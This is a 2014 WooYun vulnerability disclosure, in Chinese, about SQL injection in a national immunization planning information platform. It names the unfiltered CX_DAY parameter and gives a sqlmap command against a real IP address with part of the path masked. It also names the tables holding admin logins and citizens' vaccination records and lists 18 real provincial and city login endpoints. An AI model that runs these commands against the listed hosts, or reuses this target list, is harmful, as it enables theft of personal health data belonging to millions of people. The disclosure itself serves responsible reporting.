漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071085
漏洞标题:全国免疫规划信息管理平台通杀注射涉及大量数据
相关厂商:epicard.com.cn
漏洞作者: 黑暗游侠
提交时间:2014-08-05 15:53
修复时间:2014-11-03 15:54
公开时间:2014-11-03 15:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-05: 细节已通知厂商并且等待厂商处理中
2014-08-10: 厂商已经确认,细节仅向厂商公开
2014-08-13: 细节向第三方安全合作伙伴开放
2014-10-04: 细节向核心白帽子及相关领域专家公开
2014-10-14: 细节向普通白帽子公开
2014-10-24: 细节向实习白帽子公开
2014-11-03: 细节向公众公开
简要描述:
全国免疫规划信息管理平台通杀注射,涉及几亿数据
详细说明:
全国各地免疫规划信息管理平台通杀注射,系统为苏卫,几亿数据泄露
举例:
江苏省后台地址:
通杀注射URL:
CX_DAY未做过滤,为注射参数,sqlmap直接跑
完整通杀注射URL,后台+注射文件地址:
http://218.94.1.82/
*****=xxx&CX_Year=2005*****
*
sqlmap命令,其他的案例以此类推:
sqlmap -u "http://218.94.1.82/
*****=xxx&CX_Year=2005*****
*" --dbs --threads 8
数据库此套系统配套的,均为EPI_XXXX,可以利用sqlmap --current-db查看
后台管理登录用户在EPI_XXXX数据库下的SYS_USER表中,所有的公民信息都在EPI_XXX数据库下的EPI_JZJL表中,可以利用sqlmap --count查看数量,一个省估计就有6000W,市大概2000W左右,各省市加起来已超几亿
具体全国各省市案例举例部分如下:
*****ode*****
**********
1.://**.**.**//218.94.1.82/JiangSu/systemsetting/userLogin.action_
**********
2.://**.**.**//221.0.95.10:81/YANTAI/systemsetting/userLogin.action_
**********
3.://**.**.**//221.2.136.226:81/WeiHai/systemsetting/userLogin.action_
**********
4.://**.**.**//222.43.17.20:81/BinZhou/systemsetting/userLogin.action_
**********
5.://**.**.**//124.128.199.18:81/JiNan/systemsetting/userLogin.action_
**********
6.://**.**.**//222.173.107.8:81/QingDao/systemsetting/userLogin.action_
**********
7.://**.**.**//61.174.211.147:81/ShaoXing/web/systemsetting/userLogin.action_
**********
8.://**.**.**//data.zjepi.net/ZheJiang/systemsetting/userLogin.action_
**********
9.://**.**.**//epi.srcdc.cn:81/ShangRao/systemsetting/userLogin.action_
**********
10.://**.**.**//222.134.193.3:81/LaiWu/systemsetting/userLogin.action_
**********
11.://**.**.**//221.230.140.53:81/TaiZhou/systemsetting/userLogin.action_
**********
12.://**.**.**//221.2.209.123:81/LiaoCheng/systemsetting/userLogin.action_
**********
13.://**.**.**//123.130.246.107:81/HeZe/systemsetting/userLogin.action_
**********
14.://**.**.**//222.133.50.115:81/DeZhou/systemsetting/userLogin.action_
**********
15.://**.**.**//122.224.254.131:81/HangZhou/systemsetting/userLogin.action_
**********
16.://**.**.**//60.211.241.117:81/JiNing/systemsetting/userLogin.action_
**********
17.://**.**.**//221.2.55.101:81/RiZhao/systemsetting/userLogin.action_
**********
18.://**.**.**//61.177.181.61:81/YangZhou/systemsetting/userLogin.action
…
…
</code></mask>
漏洞证明:
修复方案:
加急!!!!wooyun现金求给力!!!!
版权声明:转载请注明来源 黑暗游侠@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2014-08-10 09:30
厂商回复:
最新状态:
暂无